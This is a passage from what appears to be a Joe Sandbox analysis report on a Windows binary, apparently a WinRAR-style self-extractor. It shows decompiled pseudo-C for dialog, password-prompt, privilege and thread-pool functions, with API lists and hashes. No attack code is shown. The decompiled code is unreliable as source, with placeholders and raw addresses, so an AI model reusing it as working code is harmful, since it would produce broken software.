								__eflags =  *_t116 & 0x00000010;
								if(( *_t116 & 0x00000010) != 0) {
									goto L41;
								} else {
									goto L23;
								}
							}
						}
					}
					L42:
					return _t80;
				}
			}















































                0x003f31d6
                0x003f31d6
                0x003f31dd
                0x003f31e0
                0x003f31e6
                0x003f3305
                0x003f31ec
                0x003f31ec
                0x003f31ed
                0x003f31ee
                0x003f31f5
                0x003f31f8
                0x003f31fb
                0x003f3201
                0x003f320b
                0x003f3230
                0x003f3235
                0x003f323a
                0x003f3301
                0x00000000
                0x003f3302
                0x003f323a
                0x003f320b
                0x003f3240
                0x003f3243
                0x003f3246
                0x003f324c
                0x003f3252
                0x003f3264
                0x003f3269
                0x003f326c
                0x003f326f
                0x003f3272
                0x003f3275
                0x003f327b
                0x003f3281
                0x003f3284
                0x003f3287
                0x003f3296
                0x003f3297
                0x003f3297
                0x003f329c
                0x003f32af
                0x003f32b1
                0x003f32b6
                0x003f32c1
                0x003f32c3
                0x003f32c5
                0x003f32e1
                0x003f32e6
                0x003f32e9
                0x003f32e9
                0x003f32c1
                0x003f32b6
                0x003f32ef
                0x003f32f0
                0x003f32f3
                0x003f32f6
                0x003f32f9
                0x003f32fc
                0x003f3287
                0x00000000
                0x003f327b
                0x003f3306
                0x003f330b
                0x003f330f
                0x003f3312
                0x003f3313
                0x003f3314
                0x003f3315
                0x003f3318
                0x003f331a
                0x003f3392
                0x003f3394
                0x003f3394
                0x003f331c
                0x003f331c
                0x003f331f
                0x003f3322
                0x00000000
                0x003f3324
                0x003f3324
                0x003f3327
                0x003f332a
                0x003f3331
                0x003f3331
                0x003f3334
                0x003f3336
                0x003f3338
                0x003f336a
                0x003f336a
                0x003f336d
                0x003f3374
                0x003f3374
                0x003f3377
                0x003f337a
                0x003f3381
                0x003f3381
                0x003f3384
                0x003f338b
                0x003f338d
                0x003f338d
                0x003f3386
                0x003f3386
                0x003f3389
                0x00000000
                0x00000000
                0x003f3389
                0x003f337c
                0x003f337c
                0x003f337f
                0x00000000
                0x00000000
                0x003f337f
                0x003f336f
                0x003f336f
                0x003f3372
                0x00000000
                0x00000000
                0x003f3372
                0x003f338e
                0x003f333a
                0x003f333a
                0x003f333a
                0x003f333d
                0x003f333d
                0x003f333f
                0x003f3341
                0x00000000
                0x00000000
                0x003f3343
                0x003f3345
                0x003f3359
                0x003f3359
                0x003f3347
                0x003f3347
                0x003f334a
                0x003f334d
                0x00000000
                0x003f334f
                0x003f334f
                0x003f3352
                0x003f3355
                0x003f3357
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f3357
                0x003f334d
                0x003f3362
                0x003f3362
                0x003f3364
                0x00000000
                0x003f3366
                0x003f3366
                0x003f3366
                0x00000000
                0x003f3364
                0x003f335d
                0x003f335f
                0x003f335f
                0x00000000
                0x003f335f
                0x003f332c
                0x003f332c
                0x003f332f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f332f
                0x003f332a
                0x003f3322
                0x003f3395
                0x003f3399
                0x003f3399

                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003F31FB
                • _abort.LIBCMT ref: 003F3306
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: EncodePointer_abort
                • String ID: MOC$RCC
                • API String ID: 948111806-2084237596
                • Opcode ID: 71f7523133429b998188f5189a76004337f8b3ab80847f2925b759ec8250391e
                • Instruction ID: 420e016a22b3b1e1ea5a9a6cefef137344db878fd9b457560593ffb57070bb75
                • Opcode Fuzzy Hash: 71f7523133429b998188f5189a76004337f8b3ab80847f2925b759ec8250391e
                • Instruction Fuzzy Hash: 59413A7190020DAFCF16DF98CD81AEEBBB5FF48304F158559FA046B262D735AA90DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                Download Yara Rule
                C-Code - Quality: 66%
                			E003D7401(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t31;
				long _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t49;
				void* _t62;
				void* _t63;
				void* _t66;

				_t62 = __esi;
				_t48 = __ebx;
				E003EEB78(0x4027b7, _t66);
				E003EEC50(0x1060);
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				 *((intOrPtr*)(_t66 - 0x1c)) = 0;
				 *((intOrPtr*)(_t66 - 0x18)) = 0;
				 *((intOrPtr*)(_t66 - 0x14)) = 0;
				 *((char*)(_t66 - 0x10)) = 0;
				_t59 =  *((intOrPtr*)(_t66 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t66 - 4)) = 0;
				_push(_t66 - 0x20);
				if(E003D3BBA( *((intOrPtr*)(_t66 + 8))) != 0) {
					if( *0x411022 == 0) {
						if(E003D7A9C(L"SeSecurityPrivilege") != 0) {
							 *0x411021 = 1;
						}
						E003D7A9C(L"SeRestorePrivilege");
						 *0x411022 = 1;
					}
					_push(_t62);
					_t63 = 7;
					if( *0x411021 != 0) {
						_t63 = 0xf;
					}
					_push(_t48);
					_t49 =  *((intOrPtr*)(_t66 - 0x20));
					_push(_t49);
					_push(_t63);
					_push( *((intOrPtr*)(_t66 + 0xc)));
					if( *0x433000() == 0) {
						if(E003DBB03( *((intOrPtr*)(_t66 + 0xc)), _t66 - 0x106c, 0x800) == 0) {
							L10:
							E003D2021(_t75, 0x52, _t59 + 0x32,  *((intOrPtr*)(_t66 + 0xc)));
							_t38 = GetLastError();
							E003D6DCB(0x411098, _t75);
							if(_t38 == 5 && E003E07BC() == 0) {
								E003D15C6(_t66 - 0x6c, 0x18);
								E003E15FE(_t66 - 0x6c);
							}
							E003D6D83(0x411098, 1);
						} else {
							_t45 =  *0x433000(_t66 - 0x106c, _t63, _t49);
							_t75 = _t45;
							if(_t45 == 0) {
								goto L10;
							}
						}
					}
				}
				_t31 =  *((intOrPtr*)(_t66 - 0x20));
				 *((intOrPtr*)(_t66 - 4)) = 2;
				if(_t31 != 0) {
					if( *((char*)(_t66 - 0x10)) != 0) {
						E003DF445(_t31,  *((intOrPtr*)(_t66 - 0x18)));
						_t31 =  *((intOrPtr*)(_t66 - 0x20));
					}
					_t31 = L003F3E2E(_t31);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return _t31;
			}











                0x003d7401
                0x003d7401
                0x003d7406
                0x003d7410
                0x003d7418
                0x003d741b
                0x003d741e
                0x003d7421
                0x003d7424
                0x003d7427
                0x003d742c
                0x003d742d
                0x003d742e
                0x003d7434
                0x003d743c
                0x003d7449
                0x003d7457
                0x003d7459
                0x003d7459
                0x003d7465
                0x003d746a
                0x003d746a
                0x003d7478
                0x003d747b
                0x003d747c
                0x003d7480
                0x003d7480
                0x003d7481
                0x003d7482
                0x003d7485
                0x003d7486
                0x003d7487
                0x003d7492
                0x003d74aa
                0x003d74bf
                0x003d74c8
                0x003d74cd
                0x003d74dc
                0x003d74e4
                0x003d74f4
                0x003d74fc
                0x003d74fc
                0x003d7505
                0x003d74ac
                0x003d74b5
                0x003d74bb
                0x003d74bd
                0x00000000
                0x00000000
                0x003d74bd
                0x003d74aa
                0x003d750b
                0x003d750c
                0x003d750f
                0x003d7519
                0x003d751f
                0x003d7525
                0x003d752a
                0x003d752a
                0x003d752e
                0x003d7533
                0x003d7537
                0x003d753f

                APIs
                • __EH_prolog.LIBCMT ref: 003D7406
                  • Part of subcall function 003D3BBA: __EH_prolog.LIBCMT ref: 003D3BBF
                • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 003D74CD
                  • Part of subcall function 003D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 003D7AAB
                  • Part of subcall function 003D7A9C: GetLastError.KERNEL32 ref: 003D7AF1
                  • Part of subcall function 003D7A9C: CloseHandle.KERNEL32(?), ref: 003D7B00
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: c1a6132770167c0e43c8f55deeef839efc6171b99027408a7c06cfda6e1f335e
                • Instruction ID: 3de9f10190e12bc1f2b1234b913d30931929460df559a6a4dc1775856f05106a
                • Opcode Fuzzy Hash: c1a6132770167c0e43c8f55deeef839efc6171b99027408a7c06cfda6e1f335e
                • Instruction Fuzzy Hash: 8331A172D04258AADF13EFA4AC45BEE7FB9AF49304F054027F505AB392D7748A44CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EAAC9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 003EAAD2
                • GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,003EA829,?,?,?), ref: 003EAB01
                • ReleaseDC.USER32(00000000,?), ref: 003EAB99
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ObjectRelease
                • String ID: 7>
                • API String ID: 1429681911-87537302
                • Opcode ID: 64c7591404909433cc3fed3b0265753d6090345990b3de4bed4465a23d560d41
                • Instruction ID: 1589ddcc085ef9e6d8411e18204c3ccddfc61454665cbf6678c842427fc49549
                • Opcode Fuzzy Hash: 64c7591404909433cc3fed3b0265753d6090345990b3de4bed4465a23d560d41
                • Instruction Fuzzy Hash: B3214572108304AFE3059FA5DC48E6FBFF9FB89352F001829FA4692224D7359A548B66
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E003EAD10(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				intOrPtr _t19;
				void* _t22;
				WCHAR** _t24;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E003D1316(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0x431cb8 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0x431cb8), ( *0x431cb8)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_t19 = E003DC29A(__eflags,  *( *0x431cb8));
					_t22 = E003D1100(_t30, E003DE617(0x8e),  *( *0x431cb8), _t19, 0);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0x431cb8));
					goto L13;
				}
				goto L6;
			}












                0x003ead11
                0x003ead16
                0x003ead1b
                0x003ead20
                0x003ead38
                0x003eadc8
                0x003eadca
                0x00000000
                0x003eadca
                0x003ead3e
                0x003ead44
                0x003eadb7
                0x003eadb9
                0x003eadbf
                0x003eadc2
                0x00000000
                0x003eadc2
                0x003ead49
                0x003ead5d
                0x00000000
                0x003ead5d
                0x003ead4e
                0x003ead51
                0x003eadad
                0x003eadb3
                0x003ead97
                0x003ead98
                0x00000000
                0x003ead98
                0x003ead53
                0x003ead56
                0x003ead95
                0x00000000
                0x003ead95
                0x003ead5b
                0x003ead6a
                0x003ead83
                0x003ead88
                0x003ead8a
                0x00000000
                0x00000000
                0x003ead91
                0x00000000
                0x003ead91
                0x00000000

                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • EndDialog.USER32(?,00000001), ref: 003EAD98
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 003EADAD
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 003EADC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: 410059cb4b0c1d6333b91d451c8efba5eb490c02639929c087426c09e47faf97
                • Instruction ID: a762e954cb97ba3b994ea91090d0e4b926b375fafdfdee4b013645e027045129
                • Opcode Fuzzy Hash: 410059cb4b0c1d6333b91d451c8efba5eb490c02639929c087426c09e47faf97
                • Instruction Fuzzy Hash: 6E11E632240660BFD7139F69EC15F6B7BA9EF4A702F110221F240DB5F0C761B915972A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EDDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 66%
                			E003EDDA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				void* _v4100;
				void* __ebx;
				int _t19;
				void* _t21;
				signed int _t24;
				void* _t26;
				void* _t28;
				signed int _t31;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t46;
				void* _t50;

				E003EEC50(0x1000);
				if( *0x41c572 == 0) {
					_t46 =  *0x418458; // 0x303f2
					if(_a4 == 2) {
						_t24 =  *0x4330a8(_t46);
						asm("sbb eax, eax");
						_t46 = _t46 &  ~_t24;
					}
					E003DBAAD(_a8, _a12,  &_v4100, 0x800);
					_t19 = DialogBoxParamW( *0x41102c, L"GETPASSWORD1", _t46, E003EB270,  &_v4100);
					_t28 = _a16;
					if(_t19 == 0) {
						E003DF3FA(_t28, _t28, 0x4035f4);
						 *0x418454 = 1;
						_t21 = 0;
					} else {
						_t33 = 0x40;
						memcpy(_t28, 0x427a78, _t33 << 2);
						_t50 = _t50 + 0xc;
						_t21 = 1;
						asm("movsw");
					}
					if( *((char*)(_t28 + 0x100)) != 0) {
						_t31 = 0x40;
						_t21 = memcpy(0x41c472, _t28, _t31 << 2);
						asm("movsw");
					}
					return _t21;
				}
				_t35 = 0x40;
				_t26 = memcpy(_a16, 0x41c472, _t35 << 2);
				asm("movsw");
				return _t26;
			}















                0x003edda8
                0x003eddb9
                0x003eddd3
                0x003eddd9
                0x003edddc
                0x003edde4
                0x003edde6
                0x003edde6
                0x003eddfb
                0x003ede18
                0x003ede1e
                0x003ede23
                0x003ede3f
                0x003ede44
                0x003ede4b
                0x003ede25
                0x003ede27
                0x003ede2f
                0x003ede2f
                0x003ede33
                0x003ede34
                0x003ede34
                0x003ede54
                0x003ede58
                0x003ede60
                0x003ede62
                0x003ede62
                0x00000000
                0x003ede64
                0x003eddc5
                0x003eddc6
                0x003eddc8
                0x00000000

                APIs
                • DialogBoxParamW.USER32(GETPASSWORD1,000303F2,003EB270,?,?), ref: 003EDE18
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DialogParam
                • String ID: GETPASSWORD1$r>$xzB
                • API String ID: 665744214-857704663
                • Opcode ID: a35172ee69b153133439a5de320e4fb67fc9e0f2de461f38831d25f5f46ad115
                • Instruction ID: 311c26750cbab8926688a0f6391a6439795e5da6b4fea6a6201ccb2c973ec19d
                • Opcode Fuzzy Hash: a35172ee69b153133439a5de320e4fb67fc9e0f2de461f38831d25f5f46ad115
                • Instruction Fuzzy Hash: D61138326442A4AADB139E35AC45BEF3798AB49351F158135FD45AF1C0CBB4AC84C768
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 57%
                			E003DD8EC(void* __ebx, void* __ecx, void* __edx) {
				void* __esi;
				void* _t22;
				intOrPtr _t26;
				signed int* _t30;
				void* _t33;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t50;

				_t43 = __edx;
				_t42 = __ecx;
				_t41 = __ebx;
				_t47 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t45 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) <= 0) {
					L12:
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t47 + 0x5c)) =  *((intOrPtr*)(_t47 + 0x6c));
					 *((char*)(_t47 + 8)) = 0;
					 *((intOrPtr*)(_t47 + 0x60)) = _t47 + 8;
					if( *((intOrPtr*)(_t47 + 0x74)) != 0) {
						E003E1DA7( *((intOrPtr*)(_t47 + 0x74)), _t47 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t47 + 0x70));
					if(_t26 == 0) {
						E003E05A7(_t47 + 8, "s", 0x50);
					} else {
						_t33 = _t26 - 1;
						if(_t33 == 0) {
							_push(_t47 - 0x48);
							_push("$%s");
							goto L8;
						} else {
							if(_t33 == 1) {
								_push(_t47 - 0x48);
								_push("@%s");
								L8:
								_push(0x50);
								_push(_t47 + 8);
								E003DE5B1();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t30 = E003F6159(_t41, _t42, _t43, _t45, _t47 + 0x58,  *((intOrPtr*)(_t45 + 0x14)),  *((intOrPtr*)(_t45 + 0x18)), 4, E003DD710);
					if(_t30 == 0) {
						goto L12;
					} else {
						_t20 = 0x40e278 +  *_t30 * 0xc; // 0x404788
						E003F67C0( *((intOrPtr*)(_t47 + 0x78)),  *_t20,  *((intOrPtr*)(_t47 + 0x7c)));
						_t22 = 1;
					}
				}
				return _t22;
			}














                0x003dd8ec
                0x003dd8ec
                0x003dd8ec
                0x003dd8ed
                0x003dd8f1
                0x003dd8f8
                0x003dd8fe
                0x003dd9a6
                0x003dd9a6
                0x003dd904
                0x003dd90b
                0x003dd911
                0x003dd915
                0x003dd918
                0x003dd923
                0x003dd923
                0x003dd92b
                0x003dd92e
                0x003dd969
                0x003dd930
                0x003dd930
                0x003dd933
                0x003dd948
                0x003dd949
                0x00000000
                0x003dd935
                0x003dd938
                0x003dd93d
                0x003dd93e
                0x003dd94e
                0x003dd951
                0x003dd953
                0x003dd954
                0x003dd959
                0x003dd959
                0x003dd938
                0x003dd933
                0x003dd97f
                0x003dd989
                0x00000000
                0x003dd98b
                0x003dd991
                0x003dd99a
                0x003dd9a2
                0x003dd9a2
                0x003dd989
                0x003dd9ad

                APIs
                • __fprintf_l.LIBCMT ref: 003DD954
                • _strncpy.LIBCMT ref: 003DD99A
                  • Part of subcall function 003E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00411030,?,003DD928,00000000,?,00000050,00411030), ref: 003E1DC4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ByteCharMultiWide__fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 562999700-834177443
                • Opcode ID: 7698b8cf7b398832109ed501997463f3786d3bcae8cf59351320b329fc5950ad
                • Instruction ID: 11e491d615030d1d67b1d75b53eee7fabb34fa436df3f46a24e6e769bfadbdaf
                • Opcode Fuzzy Hash: 7698b8cf7b398832109ed501997463f3786d3bcae8cf59351320b329fc5950ad
                • Instruction Fuzzy Hash: 1E21A53354024CAEDB22EEA4DC05FEE7BACAF05300F140523F910A6292E372D658CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E003E0E46(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 <= _t23) {
					if(_t11 == 0) {
						 *__ecx = 1;
						_t11 = 1;
					}
				} else {
					 *__ecx = _t23;
					_t11 = _t23;
				}
				_t25[0x41] = 0;
				if(_t11 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x411098);
					E003D6C31(E003D6C36(_t19), 0x411098, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}









                0x003e0e46
                0x003e0e46
                0x003e0e4e
                0x003e0e54
                0x003e0e56
                0x003e0e5a
                0x003e0e64
                0x003e0e66
                0x003e0e68
                0x003e0e68
                0x003e0e5c
                0x003e0e5c
                0x003e0e5e
                0x003e0e5e
                0x003e0e6c
                0x003e0e74
                0x003e0e76
                0x003e0e76
                0x003e0e78
                0x003e0e7e
                0x003e0e85
                0x003e0e99
                0x003e0e9f
                0x003e0ea5
                0x003e0eb1
                0x003e0eb7
                0x003e0ec1
                0x003e0ecd
                0x003e0ecd
                0x003e0ed3
                0x003e0edb
                0x003e0ee1
                0x003e0eea

                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,003DAC5A,00000008,?,00000000,?,003DD22D,?,00000000), ref: 003E0E85
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,003DAC5A,00000008,?,00000000,?,003DD22D,?,00000000), ref: 003E0E8F
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,003DAC5A,00000008,?,00000000,?,003DD22D,?,00000000), ref: 003E0E9F
                Strings
                • Thread pool initialization failed., xrefs: 003E0EB7
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: bc2a4999a0484f45728951f96f48546c9f9b381e96218e0e3240cb8d05cb0317
                • Instruction ID: 50887e96cb6886158f3c8710d4073d7886757354b973d9f266616b6cfe611a15
                • Opcode Fuzzy Hash: bc2a4999a0484f45728951f96f48546c9f9b381e96218e0e3240cb8d05cb0317
                • Instruction Fuzzy Hash: A011C4B16007089FC3264F76AC849ABFBDCEBA4740F10483EF1DAC3240D6B159808B54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Malloc
                • String ID: (>$2>$A
                • API String ID: 2696272793-2333864759
                • Opcode ID: 98715fac15b3cd596ff9d9da56871cbfd97980803ccc72d1e6361fb9a0b0e0b8
                • Instruction ID: b83e8acf907742c6e983a29c93c8b1265a1e16165940e637b8c38ce21397d960
                • Opcode Fuzzy Hash: 98715fac15b3cd596ff9d9da56871cbfd97980803ccc72d1e6361fb9a0b0e0b8
                • Instruction Fuzzy Hash: A4011B71901219ABCB15CFA4E9489DEBBF8AF09300B10416AE905E7310D7359A40CF94
                Uniqueness

